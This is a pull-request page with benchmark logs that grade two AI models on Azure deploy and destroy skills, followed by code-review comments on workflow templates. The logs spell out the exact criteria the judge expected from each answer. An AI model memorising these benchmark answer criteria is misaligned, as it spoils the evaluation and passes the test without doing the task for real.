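Since the score is the same on both runs of each negative task, these failures look deterministic and point at how the prompt relates to the skill description rather than at model behavior.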

Positive — Local deploy of an existing deployment artifact

Run 2/2 (failed):

  • answer_quality (0.00): fail: Missing criterion 4: Criteria 1, 2, 3 met (mentions az stack sub create, includes --action-on-unmanage deleteAll, references .github/skills/azure-stack-deploy/scripts/deploy-stack.sh). Criterion 4 not fully met: the response mentions state.json write but does not specify schemaVersion 1.0, nor does it explicitly state that the stack ID and managed resources are captured in it.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.83): Prompt is trigger-aligned (score 0.83 >= 0.50)

Benchmark: azure-stack-deploy-eval | Skill: azure-stack-deploy | Model: claude-sonnet-4.6

Results saved to: .waza-results/azure-stack-deploy-claude-sonnet-4.6.json

Model: gpt-5.3-codex

Running benchmark: azure-stack-deploy-eval
Skill: azure-stack-deploy
Engine: copilot-sdk
Model: gpt-5.3-codex
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [2/5] Negative — Off-topic prompt (Linux kernel scheduling)
✗ [1/5] Negative — Destroying / tearing down an existing deployment
✗ [3/5] Negative — What-if preview / preflight validation
✓ [5/5] Positive — Re-deploy after template edit
✗ [4/5] Positive — Local deploy of an existing deployment artifact

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.78 | Duration: 1m55.058s

  • Tests: 5 total, 2 passed, 3 failed, 0 errors
  • Success Rate: 40.0%
  • Score Range: 0.60 - 0.86 (σ=0.0946)

Task Results

| Task | Score | Status | Graders |
| --- | --- | --- | --- |
| Negative — Destroying / tearing down an existing deployment | 0.86 | ✗ | budget, trigger_relevance_negative |
| Negative — Off-topic prompt (Linux kernel scheduling) | 0.60 | ✓ | budget, trigger_relevance_negative |
| Negative — What-if preview / preflight validation | 0.82 | ✗ | budget, trigger_relevance_negative |
| Positive — Local deploy of an existing deployment artifact | 0.78 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Re-deploy after template edit | 0.85 | ✓ | answer_quality, budget, trigger_relevance_positive |

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — Local deploy of an existing deployment artifact: 50% pass rate, score=0.78±0.17

Failed Task Details

Negative — Destroying / tearing down an existing deployment

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.71): Prompt appears trigger-aligned unexpectedly (score 0.71 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.71): Prompt appears trigger-aligned unexpectedly (score 0.71 >= 0.50)

Negative — What-if preview / preflight validation

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.65): Prompt appears trigger-aligned unexpectedly (score 0.65 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.65): Prompt appears trigger-aligned unexpectedly (score 0.65 >= 0.50)

Positive — Local deploy of an existing deployment artifact

Run 1/2 (failed):

  • answer_quality (0.00): fail: Missing detail on state.json contents: Criteria 1, 2, 3 met: response names az stack sub create, includes --action-on-unmanage deleteAll, and references .github/skills/azure-stack-deploy/scripts/deploy-stack.sh. Criterion 4 NOT met: the response only says "writes state.json for single-command teardown" without mentioning schemaVersion 1.0 or that it captures the stack ID and managed resources.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.83): Prompt is trigger-aligned (score 0.83 >= 0.50)

Benchmark: azure-stack-deploy-eval | Skill: azure-stack-deploy | Model: gpt-5.3-codex

Results saved to: .waza-results/azure-stack-deploy-gpt-5.3-codex.json

🔢 Tokens (count + profile)

📊 azure-stack-deploy: 1,912 tokens (detailed ✓), 13 sections, 5 code blocks
   ⚠️  token count 1912 exceeds 1000

🎯 Quality (5-dim table)

DIMENSION          SCORE  FEEDBACK
────────────────────────────────────────────
clarity            █████  Purpose is immediately obvious, steps are logically ordered (locate → run → inspect → report), and concrete bash/PowerShell commands eliminate ambiguity. The 'What to tell the user' section is an especially useful finishing directive.
completeness       █████  Covers prerequisites, arguments, procedure, state.json schema, soft-deletable resource types, failure modes, and cross-links to related skills. Edge cases like race conditions on state.json and missing template.json are explicitly handled.
trigger_precision  ████░  USE FOR and DO NOT USE FOR sections clearly name alternative skills for adjacent tasks (destroy, preflight, template authoring), preventing misrouting. Minor gap: 'prepared Git-Ape deployment artifact' assumes familiarity with the ecosystem — a one-line definition would help new users route correctly.
scope_coverage     █████  Scope is tightly bounded to subscription-scoped stack creation and state capture. Capabilities and limitations are explicit, and the fallback path is documented with an explicit trade-off warning so agents understand when they're operating outside the ideal path.
anti_patterns      ████░  No vague instructions, no conflicting directives, and error handling is concrete (failure table with causes and recovery steps). The mandatory fallback to `az deployment sub create` is a minor complexity risk — agents could silently lose stack semantics — but the `--no-fallback` flag and the ⚠️ warning message mitigate this well.
────────────────────────────────────────────
Overall: 4.6/5.0

A high-quality, production-ready skill document. It is exceptionally thorough — schema documentation, soft-delete classification, dual-shell support, and an explicit post-run communication contract are all strong differentiators. The only actionable improvements are defining 'Git-Ape deployment artifact' for cold-start routing and ensuring the fallback path cannot be silently triggered in security-sensitive contexts.
✅ Check (compliance summary)

ℹ️ waza check expects eval.yaml colocated with SKILL.md. This repo separates them into .github/evals/azure-stack-deploy/eval.yaml, so the "Evaluation Suite: Not Found" line below is a false negative — the eval actually ran (see the Score section above).

🔍 Skill Readiness Check
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Skill: azure-stack-deploy

📋 Compliance Score: Low
   ❌  Needs significant improvement. Description too short or missing triggers.

   Issues found:
   ❌  SKILL.md is 1912 tokens (hard limit 500)

📐 Spec Compliance: 8/9 checks passed
   ❌  Does not fully meet agentskills.io specification.
   ❌  [spec-allowed-fields] Unknown frontmatter fields: argument-hint, user-invocable
     📎  agentskills.io spec allows: name, description, license, allowed-tools, metadata, compatibility

📎 Links: 0/8 valid
   ⚠️  8 link issue(s) found.
   ❌  [SKILL.md] → ../azure-stack-destroy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-stack-destroy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-deployment-preflight/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../../../website/docs/deployment/state.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-stack-destroy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-stack-destroy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-deployment-preflight/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-security-analyzer/SKILL.md: link escapes skill directory

📊 Token Budget: 1912 / 500 tokens
   ❌  Exceeds limit by 1412 tokens. Consider reducing content.

🧪 Evaluation Suite: Found
   ✅  eval.yaml detected. Run 'waza run eval.yaml' to test.

📐 Schema Validation: Passed
   ✅  eval.yaml schema valid
   ✅  5 task file(s) validated

💡 Advisory Checks
   ✅  [module-count] Found 0 reference module(s)
   ❌  [complexity] Complexity: comprehensive (1912 tokens, 0 modules)
   ✅  [negative-delta-risk] No negative delta risk patterns detected
   ✅  [procedural-content] Description contains procedural language
   ✅  [over-specificity] No over-specificity patterns detected
   ✅  [cross-model-density] Description density is optimal for cross-model use
   ❌  [body-structure] Advisory 17: body structure quality — no examples section found; no error handling or troubleshooting section found
   ✅  [progressive-disclosure] Content structure supports progressive disclosure
   ✅  [scope-reduction] Capability scope: 10 signal(s) detected (10 level-2 heading(s), 2 numbered procedure(s))

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📈 Overall Readiness
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  Your skill needs some work before submission.

🎯 Next Steps
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

To improve your skill:

1. Add a 'USE FOR:' section with 3-5 trigger phrases that activate the skill
2. Add a 'DO NOT USE FOR:' section to clarify when NOT to use this skill
3. Add routing clarity (e.g., **UTILITY SKILL**, INVOKES:, FOR SINGLE OPERATIONS:)
4. Run 'waza dev' for interactive compliance improvement
5. Fix spec violation [spec-allowed-fields]: Unknown frontmatter fields: argument-hint, user-invocable
6. Fix 8 link(s) that escape the skill directory
7. Reduce SKILL.md by 1412 tokens. Run 'waza tokens suggest' for optimization tips

Skill: azure-stack-destroy

📈 Score (per model) + Suggestions/Recommendations
Model: claude-sonnet-4.6

Running benchmark: azure-stack-destroy-eval
Skill: azure-stack-destroy
Engine: copilot-sdk
Model: claude-sonnet-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✗ [2/5] Negative — Deleting a non-Git-Ape resource group
✗ [1/5] Negative — Deploying a new stack (opposite operation)
✓ [3/5] Negative — Off-topic prompt (Linux kernel scheduling)
✗ [4/5] Positive — Clean up the deployment stack
✓ [5/5] Positive — Local destroy of a Git-Ape deployment

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.77 | Duration: 1m55.947s

  • Tests: 5 total, 2 passed, 3 failed, 0 errors
  • Success Rate: 40.0%
  • Score Range: 0.60 - 0.96 (σ=0.1399)

Task Results

| Task | Score | Status | Graders |
| --- | --- | --- | --- |
| Negative — Deploying a new stack (opposite operation) | 0.81 | ✗ | budget, trigger_relevance_negative |
| Negative — Deleting a non-Git-Ape resource group | 0.87 | ✗ | budget, trigger_relevance_negative |
| Negative — Off-topic prompt (Linux kernel scheduling) | 0.60 | ✓ | budget, trigger_relevance_negative |
| Positive — Clean up the deployment stack | 0.62 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Local destroy of a Git-Ape deployment | 0.96 | ✓ | answer_quality, budget, trigger_relevance_positive |

Failed Task Details

Negative — Deploying a new stack (opposite operation)

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.62): Prompt appears trigger-aligned unexpectedly (score 0.62 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.62): Prompt appears trigger-aligned unexpectedly (score 0.62 >= 0.50)

Negative — Deleting a non-Git-Ape resource group

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.73): Prompt appears trigger-aligned unexpectedly (score 0.73 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.73): Prompt appears trigger-aligned unexpectedly (score 0.73 >= 0.50)

Positive — Clean up the deployment stack

Run 1/2 (failed):

  • answer_quality (0.00): fail: Missing explicit contrast with raw az group delete: Criteria 2, 3, 4 are met: response references state.json prerequisite under .azure/deployments/deploy-20260524-test/, mentions az stack sub delete --action-on-unmanage deleteAll removing all resources across all RGs in one call, and covers purging Key Vaults and Cognitive Services soft-deletes. However, criterion 1 is only partially met — the response recommends the destroy-stack.sh script over raw az commands, but does NOT explicitly explain WHY raw az group delete is inadequate (i.e., that it misses soft-delete cleanup and multi-RG/subscription-scope resources). The rationale comparison is absent.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.88): Prompt is trigger-aligned (score 0.88 >= 0.50)

Run 2/2 (failed):

  • answer_quality (0.00): fail: Missing explicit comparison to raw az group delete: Criterion 1 not fully met: the response recommends the destroy-stack.sh script and mentions deleteAll semantics, but does NOT explicitly contrast with raw az group delete nor explain that raw RG delete misses soft-delete cleanup and multi-RG/subscription-scope resources. Criteria 2, 3, 4 are satisfied (state.json prerequisite mentioned, deleteAll semantics described, Key Vault/Cognitive Services purge sweep covered).
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.88): Prompt is trigger-aligned (score 0.88 >= 0.50)

Benchmark: azure-stack-destroy-eval | Skill: azure-stack-destroy | Model: claude-sonnet-4.6

Results saved to: .waza-results/azure-stack-destroy-claude-sonnet-4.6.json

Model: gpt-5.3-codex

Running benchmark: azure-stack-destroy-eval
Skill: azure-stack-destroy
Engine: copilot-sdk
Model: gpt-5.3-codex
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [3/5] Negative — Off-topic prompt (Linux kernel scheduling)
✗ [1/5] Negative — Deploying a new stack (opposite operation)
✗ [2/5] Negative — Deleting a non-Git-Ape resource group
✗ [5/5] Positive — Local destroy of a Git-Ape deployment
✗ [4/5] Positive — Clean up the deployment stack

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.74 | Duration: 1m54.897s

  • Tests: 5 total, 1 passed, 4 failed, 0 errors
  • Success Rate: 20.0%
  • Score Range: 0.60 - 0.87 (σ=0.1064)

Task Results

| Task | Score | Status | Graders |
|---|---|---|---|
| Negative — Deploying a new stack (opposite operation) | 0.81 | ✗ | budget, trigger_relevance_negative |
| Negative — Deleting a non-Git-Ape resource group | 0.87 | ✗ | budget, trigger_relevance_negative |
| Negative — Off-topic prompt (Linux kernel scheduling) | 0.60 | ✓ | budget, trigger_relevance_negative |
| Positive — Clean up the deployment stack | 0.62 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Local destroy of a Git-Ape deployment | 0.80 | ✗ | answer_quality, budget, trigger_relevance_positive |

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — Local destroy of a Git-Ape deployment: 50% pass rate, score=0.80±0.17

Failed Task Details

Negative — Deploying a new stack (opposite operation)

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.62): Prompt appears trigger-aligned unexpectedly (score 0.62 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.62): Prompt appears trigger-aligned unexpectedly (score 0.62 >= 0.50)

Negative — Deleting a non-Git-Ape resource group

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.73): Prompt appears trigger-aligned unexpectedly (score 0.73 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.73): Prompt appears trigger-aligned unexpectedly (score 0.73 >= 0.50)

Positive — Clean up the deployment stack

Run 1/2 (failed):

  • answer_quality (0.00): fail: Response only points the user to the destroy script without covering the required substance.: Missing criteria:
  1. (Partial) Recommends destroy-stack.sh but does NOT explain why over raw az group delete (no mention of soft-delete cleanup or multi-RG coverage being missed).
  2. Does NOT reference the state.json prerequisite under .azure/deployments/deploy-20260524-test/.
  3. Does NOT mention az stack sub delete --action-on-unmanage deleteAll or its single-call cleanup semantics.
  4. Does NOT cover the soft-delete purge sweep (Key Vault / Cognitive Services) nor the purgeProtected: true retention behavior.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.88): Prompt is trigger-aligned (score 0.88 >= 0.50)

Run 2/2 (failed):

  • answer_quality (0.00): fail: Response missing key destroy-skill details: The assistant was blocked by tool errors and only provided a one-line command to run the destroy script. Missing criteria:
  • (1) Partial: recommends destroy-stack.sh but does not explicitly contrast with raw az group delete or explain that raw RG delete misses soft-delete cleanup / multi-RG resources.
  • (2) Missing: no mention of the state.json prerequisite under .azure/deployments/deploy-20260524-test/.
  • (3) Missing: no mention of az stack sub delete --action-on-unmanage deleteAll (or equivalent single-delete semantics).
  • (4) Missing: no mention of the soft-delete purge sweep (Key Vault, Cognitive Services) nor of purgeProtected: true retention behavior.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.88): Prompt is trigger-aligned (score 0.88 >= 0.50)

Positive — Local destroy of a Git-Ape deployment

Run 2/2 (failed):

  • answer_quality (0.00): fail: : Response recommends the azure-stack-destroy skill and destroy-stack.sh script (criterion 1 met), but fails criteria 2, 3, and 4: it does not reference state.json under .azure/deployments/deploy-20260506-001/ as the source of truth, does not name the az stack sub delete --action-on-unmanage deleteAll command/semantics, and does not mention az keyvault purge or explain the soft-delete purge sweep behavior for Key Vault name reuse.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.89): Prompt is trigger-aligned (score 0.89 >= 0.50)

Benchmark: azure-stack-destroy-eval | Skill: azure-stack-destroy | Model: gpt-5.3-codex

Results saved to: .waza-results/azure-stack-destroy-gpt-5.3-codex.json

🔢 Tokens (count + profile)

📊 azure-stack-destroy: 2,644 tokens (detailed ✓), 14 sections, 7 code blocks
   ⚠️  token count 2644 exceeds 1000

🎯 Quality (5-dim table)

DIMENSION          SCORE  FEEDBACK
────────────────────────────────────────────
clarity            █████  Instructions are exceptionally well-ordered: purpose is stated in the frontmatter description, prerequisites are tabulated, the procedure is numbered with concrete shell commands, and output examples show exactly what success looks like. The fast-vs-sync mode table is a particularly strong clarity aid.
completeness       █████  Edge cases are thoroughly covered — missing state.json, purge-protected vaults, out-of-sync stacks, subnet reference conflicts, already-destroyed stacks, and the fallback path when no stackId exists. The failure modes table with recovery steps leaves little room for an agent to get stuck.
trigger_precision  ████░  USE FOR and DO NOT USE FOR sections are well-defined with concrete phrases and scenarios; the 'Prefer this over raw az group delete' sub-section adds excellent disambiguation. Minor overlap: the 'When to Use' section partially restates USE FOR triggers, which is redundant and could cause confusion — consolidate into one section.
scope_coverage     █████  Scope is precisely bounded: subscription-scoped stacks created by Git-Ape only, with explicit exclusions for non-Git-Ape RGs, individual resource deletion, and non-Azure clouds. Capabilities (multi-RG, soft-delete purge, state update) and limitations (no surgical mode, no hand-written state.json) are both explicit.
anti_patterns      ████░  Avoids most anti-patterns well — no vague instructions, error handling is explicit, and directives don't conflict. One minor issue: the 'When to Use' section duplicates trigger phrases already in 'USE FOR', adding noise. Also, App Configuration / API Management / ML workspace purge being silently skipped (natural expiry) is documented but the agent has no guidance on whether to warn the user proactively about name-reuse delays for those types.
────────────────────────────────────────────
Overall: 4.6/5.0

A high-quality, production-grade skill definition. It is thorough, honest about limitations, and provides enough operational detail for an agent to succeed without human guidance in the common case. Minor improvements: consolidate the duplicate 'When to Use' and 'USE FOR' sections, and add a user-facing warning step for non-auto-purged soft-delete types (App Config, APIM, ML) to prevent silent name-reuse confusion.
✅ Check (compliance summary) (69 lines)

ℹ️ waza check expects eval.yaml colocated with SKILL.md. This repo separates them into .github/evals/azure-stack-destroy/eval.yaml, so the "Evaluation Suite: Not Found" line below is a false negative — the eval actually ran (see the Score section above).

🔍 Skill Readiness Check
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Skill: azure-stack-destroy

📋 Compliance Score: Low
   ❌  Needs significant improvement. Description too short or missing triggers.

   Issues found:
   ❌  SKILL.md is 2644 tokens (hard limit 500)

📐 Spec Compliance: 7/9 checks passed
   ❌  Does not fully meet agentskills.io specification.
   ❌  [spec-allowed-fields] Unknown frontmatter fields: argument-hint, user-invocable
     📎  agentskills.io spec allows: name, description, license, allowed-tools, metadata, compatibility
   ❌  [spec-security] Security risks detected: description contains XML angle brackets
     📎  XML angle brackets and reserved prefixes pose injection and naming conflict risks

📎 Links: 0/4 valid
   ⚠️  4 link issue(s) found.
   ❌  [SKILL.md] → ../azure-stack-deploy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-stack-deploy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-drift-detector/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-resource-visualizer/SKILL.md: link escapes skill directory

📊 Token Budget: 2644 / 500 tokens
   ❌  Exceeds limit by 2144 tokens. Consider reducing content.

🧪 Evaluation Suite: Found
   ✅  eval.yaml detected. Run 'waza run eval.yaml' to test.

📐 Schema Validation: Passed
   ✅  eval.yaml schema valid
   ✅  5 task file(s) validated

💡 Advisory Checks
   ✅  [module-count] Found 0 reference module(s)
   ❌  [complexity] Complexity: comprehensive (2644 tokens, 0 modules)
   ✅  [negative-delta-risk] No negative delta risk patterns detected
   ✅  [procedural-content] Description contains procedural language
   ✅  [over-specificity] No over-specificity patterns detected
   ✅  [cross-model-density] Advisory 16: first sentence doesn't lead with action verb (reduces clarity)
   ❌  [body-structure] Advisory 17: body structure quality — no examples section found; no error handling or troubleshooting section found
   ✅  [progressive-disclosure] Content structure supports progressive disclosure
   ✅  [scope-reduction] Capability scope: 8 signal(s) detected (8 level-2 heading(s), 2 numbered procedure(s))

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📈 Overall Readiness
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  Your skill needs some work before submission.

🎯 Next Steps
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

To improve your skill:

1. Add a 'USE FOR:' section with 3-5 trigger phrases that activate the skill
2. Add a 'DO NOT USE FOR:' section to clarify when NOT to use this skill
3. Add routing clarity (e.g., **UTILITY SKILL**, INVOKES:, FOR SINGLE OPERATIONS:)
4. Run 'waza dev' for interactive compliance improvement
5. Fix spec violation [spec-allowed-fields]: Unknown frontmatter fields: argument-hint, user-invocable
6. Fix spec violation [spec-security]: Security risks detected: description contains XML angle brackets
7. Fix 4 link(s) that escape the skill directory
8. Reduce SKILL.md by 2144 tokens. Run 'waza tokens suggest' for optimization tips

Contributor

Copilot AI left a comment


Pull request overview

Overhauls the /git-ape-onboarding flow: replaces the .exampleyml activation hack with a template-driven scaffolder under the skill directory, migrates deploy/destroy from az deployment sub to Azure Deployment Stacks (closes part of #30), registers the onboarding eval suite in the pilot tier, declares prompt files in the VSIX, and regenerates website docs.

Changes:

  • Removes .github/workflows/git-ape-{plan,deploy,destroy,verify}.exampleyml, ships canonical templates under .github/skills/git-ape-onboarding/templates/workflows/, plus scaffold-repo.{sh,ps1} and sync-templates.{sh,ps1} with a new git-ape-onboarding-template-check CI workflow enforcing parity.
  • Rewrites deploy + destroy templates around az stack sub create/delete --action-on-unmanage deleteAll, adds a state-file stackId/managedResources[] schema, a rollback step, a templateanalyzer staging workaround, and switches AZURE_SUBSCRIPTION_ID from secrets to vars.
  • Renames gpt-5-codex → gpt-5.3-codex in tier manifest and bench prompts; registers git-ape-onboarding in the pilot tier with 4 tasks; tightens the agent's identity contract and adds a "required inputs" gate; declares .github/prompts/ in plugin.json and registers 9 chatPromptFiles; trims .vscodeignore.
Summary per file:

| File | Description |
|---|---|
| .github/workflows/git-ape-onboarding-template-check.yml | New CI parity check (bash+pwsh sync + scaffold byte-diff). |
| .github/workflows/git-ape-deploy.exampleyml (deleted) | Old activation stub; superseded by template. |
| .github/skills/git-ape-onboarding/templates/workflows/git-ape-{plan,deploy,destroy,verify}.yml | Canonical workflow templates; Stacks migration + scan staging + rollback. |
| .github/skills/git-ape-onboarding/templates/README.md + copilot-instructions.md | Maintainer doc + canonical deployment standards. |
| .github/skills/git-ape-onboarding/scripts/{scaffold-repo,sync-templates}.{sh,ps1} | Parity scaffold + mirror scripts. |
| .github/skills/git-ape-onboarding/SKILL.md, .github/agents/git-ape-onboarding.agent.md | Drop acknowledgment phase, add invariants/identity/non-goals/required-inputs gate. |
| .github/copilot-instructions.md | Stacks-based deploy/destroy guidance. |
| .github/evals/git-ape-onboarding/{eval,tasks/*}.yaml, .github/evals/manifest.yaml | New eval suite (3 positive + 1 negative); register skill in pilot, rename codex model. |
| .github/prompts/{agent,skill}-bench.prompt.md | Update default model list. |
| extension/package.template.json, extension/.vscodeignore, plugin.json | Register prompt files in VSIX, drop dev-only .github/* paths from VSIX. |
| scripts/generate-docs.js, README.md, website/docs/** | Regenerated docs for both repo CI and scaffolded user-facing workflows. |

Copilot's findings

Comments suppressed due to low confidence (3)

.github/skills/git-ape-onboarding/templates/workflows/git-ape-verify.yml:44

  • The check now reads vars.AZURE_SUBSCRIPTION_ID (a repository variable), but the error message and summary still call it a "secret". This is misleading: a user looking at logs will go check repo Secrets, not repo Variables, and may waste time before realising the setup expects a variable. Update the user-facing messages and the missing-config copy to refer to AZURE_SUBSCRIPTION_ID as a variable. Also note git-ape-deploy.yml still writes subscription from vars.AZURE_SUBSCRIPTION_ID while the onboarding skill (Step 7) and copilot-instructions.md (line 405) still document AZURE_SUBSCRIPTION_ID as a secret — the docs and the workflow contract have diverged.

.github/skills/git-ape-onboarding/templates/workflows/git-ape-verify.yml:121

  • The verify workflow checks for git-ape-ttl-reaper.yml, but the scaffold helper (scaffold-repo.sh / scaffold-repo.ps1) does not ship a TTL Reaper template — the MAPPINGS only include plan, deploy, destroy, verify, and drift.{md,lock.yml}. Every onboarded repo will therefore see a perpetual ⚠️ Git-Ape: TTL Reaper (git-ape-ttl-reaper.yml) — not found warning in Verify Setup. Either drop this entry from the workflow list, or add the TTL Reaper template to the scaffolder and the templates/workflows/ directory.

.github/skills/git-ape-onboarding/templates/workflows/git-ape-destroy.yml:151

  • This gate accepts a state file as long as it has either stackId or deploymentId. Every state file ever written by this project has a deploymentId (it's the matrix key), so the check effectively only fails if state.json is corrupt. For a deployment created by the old (pre-Stacks) git-ape-deploy.exampleyml, stackId will be empty but deploymentId will be set — so the check passes, then az stack sub show --name "$STACK_NAME" in the next step returns a non-zero exit, the workflow records exists=false and exits 0 with "Already destroyed (stack not found)". Real Azure resources still exist, the resource group is never deleted, but the destroy run reports success and metadata.json will be flipped to destroyed. To make this Stacks-only and safe, require stackId explicitly (or, if you must accept old state files, fall back to az group delete on state.resourceGroup when stackId is empty).
  • Files reviewed: 47/47 changed files
  • Comments generated: 3
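
The destroy-gate finding above suggests requiring stackId, with an optional resource-group fallback for legacy state files. A minimal bash sketch of that decision follows. It assumes both fields have already been read from state.json into shell variables. The function name `choose_destroy_mode` and the mode labels are hypothetical and not taken from the template.

```bash
#!/usr/bin/env bash
# Hypothetical helper: classify how a deployment should be torn down based on
# two fields of state.json. It does not call Azure; it only picks a mode.
choose_destroy_mode() {
  local stack_id="$1"        # state.stackId (empty for pre-Stacks deployments)
  local resource_group="$2"  # state.resourceGroup (legacy fallback only)

  if [[ -n "$stack_id" ]]; then
    echo "stack"       # caller would run: az stack sub delete --action-on-unmanage deleteAll
  elif [[ -n "$resource_group" ]]; then
    echo "legacy-rg"   # caller would fall back to: az group delete
  else
    echo "invalid"     # neither field set: refuse rather than report success
    return 1
  fi
}

choose_destroy_mode "" "rg-demo"   # prints: legacy-rg
```

Returning non-zero for the "invalid" case keeps a state file with neither field from being reported as "already destroyed".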

Comment on lines +607 to +609
STACK_ID='${{ steps.deploy.outputs.stack_id }}'
MANAGED='${{ steps.deploy.outputs.managed_resources }}'
MANAGED=${MANAGED:-[]}
Member Author


Fixed in d6b41dc. managed_resources and stack_id are now passed through env: and read as MANAGED="${MANAGED_RESOURCES:-[]}", then validated with jq empty (falling back to [] on invalid/empty JSON) before being consumed via jq --argjson managedResources. No more single-quoted JSON literal.

Comment on lines +288 to +302
# Also snapshot the previous template from git (parent commit of this merge
# or origin/main for /deploy comment). Used to redeploy last-known-good on failure.
DEPLOY_DIR="${{ steps.params.outputs.deploy_dir }}"
mkdir -p /tmp/rollback
if git show HEAD~1:"$DEPLOY_DIR/template.json" > /tmp/rollback/template.json 2>/dev/null; then
  cp "$DEPLOY_DIR/parameters.json" /tmp/rollback/parameters.json 2>/dev/null || true
  # Prefer the previous parameters if they exist at HEAD~1
  git show HEAD~1:"$DEPLOY_DIR/parameters.json" > /tmp/rollback/parameters.json 2>/dev/null || true
  echo "prior_template_available=true" >> "$GITHUB_OUTPUT"
  echo "[$(date -u +%H:%M:%S)] Previous template captured from HEAD~1 → /tmp/rollback/"
  echo " template bytes: $(wc -c < /tmp/rollback/template.json)"
else
  echo "prior_template_available=false" >> "$GITHUB_OUTPUT"
  echo "[$(date -u +%H:%M:%S)] No previous template in git history (first deployment)"
fi
Member Author


Fixed in d6b41dc. The rollback baseline is now derived per trigger: HEAD~1 only for push; for /deploy comments we git fetch origin main --depth=1 and use origin/main. git show "$BASELINE_REF:$DEPLOY_DIR/template.json" then reads the correct previous known-good template instead of the PR head.
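
The per-trigger baseline described in this reply could be sketched roughly as below. `push` and `issue_comment` are GitHub event names. The function name `baseline_ref_for_event` is hypothetical, and the actual step in the template may be structured differently.

```bash
#!/usr/bin/env bash
# Hypothetical helper: map the triggering event to the git ref that holds the
# last known-good template, as described in the reply above.
baseline_ref_for_event() {
  local event_name="$1"
  case "$event_name" in
    push)          echo "HEAD~1" ;;       # previous commit on main after merge
    issue_comment) echo "origin/main" ;;  # /deploy comment: use main, not the PR head
    *)             return 1 ;;            # unknown trigger: no baseline
  esac
}

BASELINE_REF="$(baseline_ref_for_event push)"
echo "$BASELINE_REF"   # prints: HEAD~1
```

The caller would then read the template with `git show "$BASELINE_REF:$DEPLOY_DIR/template.json"`, as quoted in the reply.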

Member Author


Follow-up: the /deploy PR-comment trigger referenced above has since been removed entirely (unverifiable comment-author authorization). The rollback baseline is now derived solely from the push trigger — HEAD~1 on main after merge — so the origin/main fetch path for /deploy no longer exists.

Comment thread website/docs/workflows/git-ape-plan.md Outdated
Comment on lines +764 to +769
if (validationStatus === 'passed' && whatifResult) {
  comment += `### What-If Analysis\n\n`;
  comment += `\`\`\`\n${whatifResult}\n\`\`\`\n\n`;
} else if (whatifStatus === 'passed' && whatifResult) {
  comment += `### What-If Analysis\n\n`;
  comment += `\`\`\`\n${whatifResult}\n\`\`\`\n\n`;
Member Author


Fixed in d6b41dc. Removed the unreachable validationStatus === passed && whatifResult branch; what-if rendering is now driven uniformly by whatifStatus === passed && whatifResult.

Contributor

@sendtoshailesh sendtoshailesh left a comment


Thanks for the substantial cleanup here — moving the onboarding scaffolds out of .github/workflows/, adding sync/parity tooling, and wiring prompt/eval registration all make sense. I also like the skip-on-collision behavior in the scaffolders and the explicit docs refresh.

I did find a few blocking issues that should be fixed before merge:

  1. Command injection in manual destroy path (.github/skills/git-ape-onboarding/templates/workflows/git-ape-destroy.yml, around lines 55-66)
